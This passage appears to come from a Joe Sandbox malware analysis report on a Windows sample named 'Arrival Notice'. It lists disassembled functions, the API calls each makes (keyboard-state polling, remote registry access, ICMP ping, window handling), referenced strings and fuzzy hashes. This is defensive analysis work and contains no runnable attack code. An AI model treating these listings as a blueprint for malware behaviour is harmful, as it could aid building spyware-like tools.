                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ItemMoveRect$Invalidate
                  • String ID:
                  • API String ID: 3096461208-0
                  • Opcode ID: 7940b8f02f0c532e825fe540b0389b85e853fd4708ca809e1878983b37706bbc
                  • Instruction ID: e56bd4ccc2b721c879f8eecd18ea1a53bf178293f7ee27402d5b9bfc103e164f
                  • Opcode Fuzzy Hash: 7940b8f02f0c532e825fe540b0389b85e853fd4708ca809e1878983b37706bbc
                  • Instruction Fuzzy Hash: 00512D74B00605AFDF18DFA8DD89AEEBBB5FB89300F148129F915E6290D7749E40CB54
                  APIs
                    • Part of subcall function 003C8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003C8BE8,?,00000000,?,?,?,?,003C8BBA,00000000,?), ref: 003C8FC5
                  • DestroyWindow.USER32(?), ref: 003C8C81
                  • KillTimer.USER32(00000000,?,?,?,?,003C8BBA,00000000,?), ref: 003C8D1B
                  • DestroyAcceleratorTable.USER32(00000000), ref: 00406973
                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,003C8BBA,00000000,?), ref: 004069A1
                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,003C8BBA,00000000,?), ref: 004069B8
                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,003C8BBA,00000000), ref: 004069D4
                  • DeleteObject.GDI32(00000000), ref: 004069E6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                  • String ID:
                  • API String ID: 641708696-0
                  • Opcode ID: f7893e6ecc156539d6cad273d5b7c9c656d1f78047db88f992189466d630d67b
                  • Instruction ID: bd2fea2927d2fc392ecdb67dafcfffc1eee3d09c5e8e692e03b8e7a3cbd8c871
                  • Opcode Fuzzy Hash: f7893e6ecc156539d6cad273d5b7c9c656d1f78047db88f992189466d630d67b
                  • Instruction Fuzzy Hash: 11618071102600DFDB269F14D948B2AB7B5FB41312F15893EE0439AAB0CB39AE91DF58
                  APIs
                    • Part of subcall function 003C9944: GetWindowLongW.USER32(?,000000EB), ref: 003C9952
                  • GetSysColor.USER32(0000000F), ref: 003C9862
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ColorLongWindow
                  • String ID:
                  • API String ID: 259745315-0
                  • Opcode ID: 1d5d6076a8ae62d42bdd63654d82e11d99144c0ecfa87f025269f3f89e62e8d6
                  • Instruction ID: b1bfacbc87eaab2c79f8ca0652205627b4b8821e176b4fb900dd2e864aae4590
                  • Opcode Fuzzy Hash: 1d5d6076a8ae62d42bdd63654d82e11d99144c0ecfa87f025269f3f89e62e8d6
                  • Instruction Fuzzy Hash: 7E41D635501750AFDB215F389C88FBA37A5AB07331F1A462AF9A2D72E2C7309D42DB15
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,003FF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00419717
                  • LoadStringW.USER32(00000000,?,003FF7F8,00000001), ref: 00419720
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,003FF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00419742
                  • LoadStringW.USER32(00000000,?,003FF7F8,00000001), ref: 00419745
                  • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00419866
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: HandleLoadModuleString$Message_wcslen
                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                  • API String ID: 747408836-2268648507
                  • Opcode ID: db026e6bec677e50fe8c4cfc940488339e7d8ed22056f70ab1aadc269013512e
                  • Instruction ID: c0596ef889d51eb8d61c7293ae2ad8557a9ff8ead12e91d10f2172fd9c70e6ff
                  • Opcode Fuzzy Hash: db026e6bec677e50fe8c4cfc940488339e7d8ed22056f70ab1aadc269013512e
                  • Instruction Fuzzy Hash: DD417172800219AACB05FBE0CD96EEE7779AF15304F640066F70576092EB396F48CB65
                  APIs
                    • Part of subcall function 003B6B57: _wcslen.LIBCMT ref: 003B6B6A
                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004107A2
                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004107BE
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004107DA
                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00410804
                  • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0041082C
                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00410837
                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0041083C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                  • API String ID: 323675364-22481851
                  • Opcode ID: 26ec08e7fbe5cd99857140d12263e0e456536237221b19dd31770612b57f1ab6
                  • Instruction ID: 60d3ce24a0b852974644e49fc750c42978c1eca97295c0fa914bba1f7bcc1ddd
                  • Opcode Fuzzy Hash: 26ec08e7fbe5cd99857140d12263e0e456536237221b19dd31770612b57f1ab6
                  • Instruction Fuzzy Hash: CD414B76C00628ABDF11EFA4DC95DEEB778FF04344F14412AEA05AB1A1EB749E44CB90
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00433C5C
                  • CoInitialize.OLE32(00000000), ref: 00433C8A
                  • CoUninitialize.OLE32 ref: 00433C94
                  • _wcslen.LIBCMT ref: 00433D2D
                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00433DB1
                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00433ED5
                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00433F0E
                  • CoGetObject.OLE32(?,00000000,0044FB98,?), ref: 00433F2D
                  • SetErrorMode.KERNEL32(00000000), ref: 00433F40
                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00433FC4
                  • VariantClear.OLEAUT32(?), ref: 00433FD8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                  • String ID:
                  • API String ID: 429561992-0
                  • Opcode ID: 8aeba083ef172a7940976ea4f2579d3eacc4ed4aa959e51a15b2648f875b6b57
                  • Instruction ID: 1d3108ec0f5d7f09bffe5cdb0f58589b85e29dfa7e93e71cc16c4ff3105120c1
                  • Opcode Fuzzy Hash: 8aeba083ef172a7940976ea4f2579d3eacc4ed4aa959e51a15b2648f875b6b57
                  • Instruction Fuzzy Hash: C7C176716083019FD700DF68C88496BBBE9FF89749F04591EF98A9B250DB34EE06CB56
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 00427AF3
                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00427B8F
                  • SHGetDesktopFolder.SHELL32(?), ref: 00427BA3
                  • CoCreateInstance.OLE32(0044FD08,00000000,00000001,00476E6C,?), ref: 00427BEF
                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00427C74
                  • CoTaskMemFree.OLE32(?,?), ref: 00427CCC
                  • SHBrowseForFolderW.SHELL32(?), ref: 00427D57
                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00427D7A
                  • CoTaskMemFree.OLE32(00000000), ref: 00427D81
                  • CoTaskMemFree.OLE32(00000000), ref: 00427DD6
                  • CoUninitialize.OLE32 ref: 00427DDC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                  • String ID:
                  • API String ID: 2762341140-0
                  • Opcode ID: 53506237fe4a9ba34b7605bdc7431e0a00dc6ddd298f8297821d1eaf1c00e94a
                  • Instruction ID: d3f6c62d7eadd0d84829f9ec05aa832e624c21077c0466f48ff0e757c3423a61
                  • Opcode Fuzzy Hash: 53506237fe4a9ba34b7605bdc7431e0a00dc6ddd298f8297821d1eaf1c00e94a
                  • Instruction Fuzzy Hash: 0CC15C75A00119AFCB14DFA4D884DAEBBF9FF48304B1484A9E91ADB361DB34ED41CB94
                  APIs
                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00445504
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00445515
                  • CharNextW.USER32(00000158), ref: 00445544
                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00445585
                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0044559B
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004455AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$CharNext
                  • String ID:
                  • API String ID: 1350042424-0
                  • Opcode ID: 48a6d529aaf9e97b68dd0e7db931d7401a2953f2cc6888fbc0c549de42ea5b99
                  • Instruction ID: 1c3df5485b32a8d0c752c238e4b1c28e0a30032f0fe7246462d870cd95f1900c
                  • Opcode Fuzzy Hash: 48a6d529aaf9e97b68dd0e7db931d7401a2953f2cc6888fbc0c549de42ea5b99
                  • Instruction Fuzzy Hash: EC61C374904608FFEF10DF50CC85AFF7B79EB06321F148156F9259A292D7388A81DB69
                  APIs
                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0040FAAF
                  • SafeArrayAllocData.OLEAUT32(?), ref: 0040FB08
                  • VariantInit.OLEAUT32(?), ref: 0040FB1A
                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0040FB3A
                  • VariantCopy.OLEAUT32(?,?), ref: 0040FB8D
                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 0040FBA1
                  • VariantClear.OLEAUT32(?), ref: 0040FBB6
                  • SafeArrayDestroyData.OLEAUT32(?), ref: 0040FBC3
                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0040FBCC
                  • VariantClear.OLEAUT32(?), ref: 0040FBDE
                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0040FBE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                  • String ID:
                  • API String ID: 2706829360-0
                  • Opcode ID: c6a668d7eb74c53c5c069f0236d4aaa9f81934d28ffba69db0279a66f0fb0330
                  • Instruction ID: 0073d956df7e97986c7c6133f45798ddcb751f055671d0da304bc10acb8632b3
                  • Opcode Fuzzy Hash: c6a668d7eb74c53c5c069f0236d4aaa9f81934d28ffba69db0279a66f0fb0330
                  • Instruction Fuzzy Hash: B7415F35A00219DFCB10DF64C8949AEBBB9EF48354F04807AE905AB661DB34E945CFA4
                  APIs
                  • GetKeyboardState.USER32(?), ref: 00419CA1
                  • GetAsyncKeyState.USER32(000000A0), ref: 00419D22
                  • GetKeyState.USER32(000000A0), ref: 00419D3D
                  • GetAsyncKeyState.USER32(000000A1), ref: 00419D57
                  • GetKeyState.USER32(000000A1), ref: 00419D6C
                  • GetAsyncKeyState.USER32(00000011), ref: 00419D84
                  • GetKeyState.USER32(00000011), ref: 00419D96
                  • GetAsyncKeyState.USER32(00000012), ref: 00419DAE
                  • GetKeyState.USER32(00000012), ref: 00419DC0
                  • GetAsyncKeyState.USER32(0000005B), ref: 00419DD8
                  • GetKeyState.USER32(0000005B), ref: 00419DEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: State$Async$Keyboard
                  • String ID:
                  • API String ID: 541375521-0
                  • Opcode ID: dc37072713cdb1c2f65c66e57245c64b1f86045776b798eacc8fcfeb9e5162fa
                  • Instruction ID: 4226504df177ad6139a8e279257ec48594c60c8ef0f01d7613870239e9324c8a
                  • Opcode Fuzzy Hash: dc37072713cdb1c2f65c66e57245c64b1f86045776b798eacc8fcfeb9e5162fa
                  • Instruction Fuzzy Hash: DF41C7346047C969FF708764D4643E7BEA06B12344F08805BDAC6567C2E7A89DC4C7AA
                  APIs
                  • WSAStartup.WSOCK32(00000101,?), ref: 004305BC
                  • inet_addr.WSOCK32(?), ref: 0043061C
                  • gethostbyname.WSOCK32(?), ref: 00430628
                  • IcmpCreateFile.IPHLPAPI ref: 00430636
                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004306C6
                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004306E5
                  • IcmpCloseHandle.IPHLPAPI(?), ref: 004307B9
                  • WSACleanup.WSOCK32 ref: 004307BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                  • String ID: Ping
                  • API String ID: 1028309954-2246546115
                  • Opcode ID: 7b577dd8cc24a1a6dccbaa307d996dac7f947da987d1dccb5c1ce46c57d8319f
                  • Instruction ID: 55998162bfcc128f6a6532be9b9bfb48fc62e22234df4cec31ff412b0eb4920b
                  • Opcode Fuzzy Hash: 7b577dd8cc24a1a6dccbaa307d996dac7f947da987d1dccb5c1ce46c57d8319f
                  • Instruction Fuzzy Hash: 3A91A0356042019FD320DF15C499F1ABBE0AF49318F1496AAF46A8F7A2C734EC41CF95
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharLower
                  • String ID: cdecl$none$stdcall$winapi
                  • API String ID: 707087890-567219261
                  • Opcode ID: b76c735d49d3d90593eaf11f3da591e89a63ea5f9e4525ea7d78b53b24980b0d
                  • Instruction ID: 994ffe9782198988268945e5e70b2a559d0bf4a0c8b68762b3d899daf722fc3d
                  • Opcode Fuzzy Hash: b76c735d49d3d90593eaf11f3da591e89a63ea5f9e4525ea7d78b53b24980b0d
                  • Instruction Fuzzy Hash: 6C51A032A006169BCF14DF68C9519BEB7A5BF68724B20522EF526EB3C4DB38DD40C794
                  APIs
                  • CoInitialize.OLE32 ref: 00433774
                  • CoUninitialize.OLE32 ref: 0043377F
                  • CoCreateInstance.OLE32(?,00000000,00000017,0044FB78,?), ref: 004337D9
                  • IIDFromString.OLE32(?,?), ref: 0043384C
                  • VariantInit.OLEAUT32(?), ref: 004338E4
                  • VariantClear.OLEAUT32(?), ref: 00433936
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                  • API String ID: 636576611-1287834457
                  • Opcode ID: 503891283aa05e70046ddb68bf1ba5082556ae9f7ccd53f8a87ac1a3b962cb82
                  • Instruction ID: 76286bdb1c1191e2c0a9d3461048596ca8d6b231c37d6793c1d3c149c5d9d93b
                  • Opcode Fuzzy Hash: 503891283aa05e70046ddb68bf1ba5082556ae9f7ccd53f8a87ac1a3b962cb82
                  • Instruction Fuzzy Hash: 0961AE70608301AFD311EF54C889B9AB7E4EF49716F10481EF5859B291C778EE49CB9A
                  APIs
                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 004233CF
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004233F0
                  Strings
                  Similarity
                  • API ID: LoadString$_wcslen
                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                  • API String ID: 4099089115-3080491070
                  • Opcode ID: 37acb9dc7dc7bc28540f9a7c114b3495ecbb89ed450445fb9b8aa0ae3a6f79d9
                  • Instruction ID: 235c06bf9e77116dbcb9e7df3f221de5b18cd4299edcb2a3acca09404014a4ad
                  • Opcode Fuzzy Hash: 37acb9dc7dc7bc28540f9a7c114b3495ecbb89ed450445fb9b8aa0ae3a6f79d9
                  • Instruction Fuzzy Hash: EB51D331900219BADF16EBE0DD42EEEB779AF04304F644066F60976062DB392F98DF64
                  APIs
                  Strings
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                  • API String ID: 1256254125-769500911
                  • Opcode ID: ffb6bcada9790df47c367a139839d3c9f9138a31c105accd5a45562945e1d95e
                  • Instruction ID: 6454220dfc89ac1a5cad4dfb8b4a1ed285da89fbaeaabb156b5326ba8f16c6ac
                  • Opcode Fuzzy Hash: ffb6bcada9790df47c367a139839d3c9f9138a31c105accd5a45562945e1d95e
                  • Instruction Fuzzy Hash: C041D232A001269ACB206F7D89A05FF77A5EBB0794B25412BE465DB380E739CDC1C7D5
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 004253A0
                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00425416
                  • GetLastError.KERNEL32 ref: 00425420
                  • SetErrorMode.KERNEL32(00000000,READY), ref: 004254A7
                  Strings
                  Similarity
                  • API ID: Error$Mode$DiskFreeLastSpace
                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                  • API String ID: 4194297153-14809454
                  • Opcode ID: b8d112206cd8da3aca672859aae510b611ce0228074daaa3d8780a1058b177c2
                  • Instruction ID: d01d153ee2302610ee574fbf71092a03aaf93e2e631f9f5ea8f987a3ef402bfe
                  • Opcode Fuzzy Hash: b8d112206cd8da3aca672859aae510b611ce0228074daaa3d8780a1058b177c2
                  • Instruction Fuzzy Hash: E931DF35B005149FC710EF68E484BEABBB4EB05309F58806BE505CB392DB38DD82CB95
                  APIs
                  • CreateMenu.USER32 ref: 00443C79
                  • SetMenu.USER32(?,00000000), ref: 00443C88
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00443D10
                  • IsMenu.USER32(?), ref: 00443D24
                  • CreatePopupMenu.USER32 ref: 00443D2E
                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00443D5B
                  • DrawMenuBar.USER32 ref: 00443D63
                  Strings
                  Similarity
                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                  • String ID: 0$F
                  • API String ID: 161812096-3044882817
                  • Opcode ID: 8c5139049da21650be947b7cf166b220693d0ce79f2342d07cf6d0b0f84a5a06
                  • Instruction ID: 77cfa599ccc97d54f49c518668a7c6c9a16c3d7a39676181483ba1419597a6ab
                  • Opcode Fuzzy Hash: 8c5139049da21650be947b7cf166b220693d0ce79f2342d07cf6d0b0f84a5a06
                  • Instruction Fuzzy Hash: 1D415CB9A01209EFEB14CF64D884AEE7BB5FF49751F14002AF95697360D734AA10CF98
                  APIs
                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00443A9D
                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00443AA0
                  • GetWindowLongW.USER32(?,000000F0), ref: 00443AC7
                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00443AEA
                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00443B62
                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00443BAC
                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00443BC7
                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00443BE2
                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00443BF6
                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00443C13
                  Similarity
                  • API ID: MessageSend$LongWindow
                  • String ID:
                  • API String ID: 312131281-0
                  • Opcode ID: 5c6c2e2770a25d1bf7664d482f7b091de5ccd1cdeb573089ba6aec7aa1af22f7
                  • Instruction ID: 3de66e524376c695438676e42590d8bd0e07af31fa82ba3bf8e3a806419c1b20
                  • Opcode Fuzzy Hash: 5c6c2e2770a25d1bf7664d482f7b091de5ccd1cdeb573089ba6aec7aa1af22f7
                  • Instruction Fuzzy Hash: CE616D75900248AFEB10DF64CC81EEE77B8EB09704F10419AFA15A73A1C774AE46DF54
                  APIs
                  • GetCurrentThreadId.KERNEL32 ref: 0041B151
                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B165
                  • GetWindowThreadProcessId.USER32(00000000), ref: 0041B16C
                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B17B
                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041B18D
                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B1A6
